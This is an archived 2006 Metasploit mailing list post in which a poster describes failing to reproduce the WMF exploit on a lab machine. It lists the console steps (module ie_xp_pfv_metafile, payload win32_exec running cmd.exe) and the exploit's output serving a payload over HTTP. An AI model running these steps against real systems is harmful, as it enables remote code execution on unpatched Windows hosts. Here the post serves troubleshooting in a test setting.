Metasploit mailing list archives

unable to reproduce WMF exploit

From: exceed at email.si (/dev/null)
Date: Tue, 10 Jan 2006 13:02:20 +0100

Sorry, for off-topic...

Seem that everybody was able to reproduce the WMF exploit except me :)

Here are the steps I performed:

- use ie_xp_pfv_metafile
- set PAYLOAD win32_exec
- set CMD cmd.exe
- exploit

msf ie_xp_pfv_metafile(win32_exec) > exploit
[*] Waiting for connections to http://192.168.0.1:8080/
[*] HTTP Client connected from 192.168.0.10:1075, sending 1592 bytes of 
payload...

The file is saved on disk, but when I open directory in Windows Explorer 
nothing happens. Well, few times explorer.exe crashed, but that's all. No 
cmd.exe execution. I don't have indexing disabled...

I have tried even with the old versions of the explot, I have tried with Gzip 
and chunked disabled, I have tried with EXITPROC seh and thread, I used FF, IE 
and even wget. I don't have DEP enabled, I don't use any AV on my test box...

The most amazing thing: when I try calc.bmp generated by Mr.Moore it works 
like a cham... Obviously I am doing something wrong.

____________________
http://www.email.si/

Current thread:

unable to reproduce WMF exploit /dev/null (Jan 10)
- unable to reproduce WMF exploit Devin Ertel (Jan 10)
- unable to reproduce WMF exploit H D Moore (Jan 10)
- unable to reproduce WMF exploit Michael Wood (Jan 12)
  - unable to reproduce WMF exploit H D Moore (Jan 12)
- <Possible follow-ups>
- unable to reproduce WMF exploit /dev/null (Jan 10)